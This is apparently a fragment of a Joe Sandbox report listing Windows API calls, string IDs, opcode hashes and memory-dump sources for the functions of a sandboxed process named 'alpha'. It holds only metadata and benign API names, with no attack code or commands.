                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcslwr
                                                                                                  • String ID: [%s]
                                                                                                  • API String ID: 886762496-302437576
                                                                                                  • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                  • Instruction ID: d956c273e2db525fb479cb8311d6e96c983df4b7e19b9383450a590d8e62bbe0
                                                                                                  • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                  • Instruction Fuzzy Hash: BA319C32709B8285EB61EF21D8503E9A7A0FB88B89F944035CE8D4BB55DF7CD685C310
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                  • API String ID: 1646373207-919018592
                                                                                                  • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                  • Instruction ID: 0aa17d8f637b380250e31f0675de3535c99a08ec9a724d7223741cafe54ece68
                                                                                                  • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                  • Instruction Fuzzy Hash: 9FF03A21B18B8192EA40AB12F444079FE60FF89BD2B98D175DA4E03B14CFBCD885C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmp$wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3270668897-0
                                                                                                  • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                  • Instruction ID: e054e8a615b3190133d4921d067e75a7b293fbac020b45e761d7782526e41fd3
                                                                                                  • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                  • Instruction Fuzzy Hash: 5751B31AE08642A1EB507F11D420179E7A0FF54B92FE88079DA0E07ED5DEACD889C370
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DriveFullNamePathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3442494845-0
                                                                                                  • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                  • Instruction ID: 67b8f34c99b1c808fc4e9e905cf9277b940ddb33a9d92cfd28027be3a76764d2
                                                                                                  • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                  • Instruction Fuzzy Hash: E731BE32719BC28AEB60DF21E8507E9B7A4FB88B85F944079EA4D47B94CF38D645C710
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                  • String ID:
                                                                                                  • API String ID: 140117192-0
                                                                                                  • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                  • Instruction ID: 1866bf5a4e4f806cbaddde4cf0c7080a1406db92ba7b3f957dec2df49e21cb62
                                                                                                  • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                  • Instruction Fuzzy Hash: B041DC35A08B41D5EB90AB08F850365B764FB88755FE04139DA8D47B64DFBEE889C730
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_get_osfhandle$TimeWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 4019809305-0
                                                                                                  • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                  • Instruction ID: 3da9f059d3bc814d8a505bba42161ef8f92b5d5c4a9eaced987106a50dc09be9
                                                                                                  • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                  • Instruction Fuzzy Hash: D131C122A0874282FBA06B15B450379EBA0BF49B52FA4527DDD0D53FE5CFBCD854C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcstol$lstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3515581199-0
                                                                                                  • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                  • Instruction ID: fe0350bc71b218975c3e115c69ccdacf3f7c003035c8abe618f73bced4b07d5d
                                                                                                  • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                  • Instruction Fuzzy Hash: 0021DC36F0874293E6606B79D464139EBA1FF49741FE56078CB4F43EA4CEACE449C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2448200120-0
                                                                                                  • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                  • Instruction ID: 0429a3c7fb78fdabe04ebd5097b80ba9f651f80460c3eb98939ff4fe5c70b7db
                                                                                                  • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                  • Instruction Fuzzy Hash: 2D212F31A1874687EB547B11A41027DFAA1FB84B82FF44179D94E47B95CFBCE841CB21
                                                                                                  APIs
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD01C
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD033
                                                                                                  • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD06D
                                                                                                  • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD07F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033415088-0
                                                                                                  • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                  • Instruction ID: de6de2ae812801f4b2c894766858642836a50032c6c44774fa09d1f592f4715b
                                                                                                  • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                  • Instruction Fuzzy Hash: 1711B232618A4287DB449B21F01417AFBE0FB8AB96F905135EA8E47F94DF7CC485CB20
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762
                                                                                                    • Part of subcall function 00007FF7823DEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
                                                                                                    • Part of subcall function 00007FF7823DEF40: wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
                                                                                                    • Part of subcall function 00007FF7823DEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
                                                                                                  • longjmp.MSVCRT ref: 00007FF7823ECCBC
                                                                                                  • longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ECCE0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                  • String ID: GeToken: (%x) '%s'
                                                                                                  • API String ID: 3282654869-1994581435
                                                                                                  • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                  • Instruction ID: 7b61cd67e8ddcab2408ed8c424b529c9d82f845491704bd68626486734819176
                                                                                                  • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                  • Instruction Fuzzy Hash: 4C61E361B0924282FA14AB21D4681B9E6A1FF44796FF44978D91D07EE1EEBCF844C330
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F97D0
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F98D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                  • String ID: Software\Classes
                                                                                                  • API String ID: 2714550308-1656466771
                                                                                                  • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                  • Instruction ID: 9cbb85585f40519163b0444a0941b5d3509c249f7fa24e79b5e04da4bbecdc79
                                                                                                  • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                  • Instruction Fuzzy Hash: 7241D722B0975281EE40FB16E46403DA3A4FB84BD1FA08179DE5E47BE1DFB9D896C350
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmp
                                                                                                  • String ID: /-Y
                                                                                                  • API String ID: 1886669725-4274875248
                                                                                                  • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                  • Instruction ID: 18477bbde160ddcd8c627ee1f678d1d662a39ffca535e3de15e589d01ce1668e
                                                                                                  • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                  • Instruction Fuzzy Hash: 21219766E0875581FA10AB12A554278FAA0BB44FC2FA44475DE8D07B94DFBCECC2D720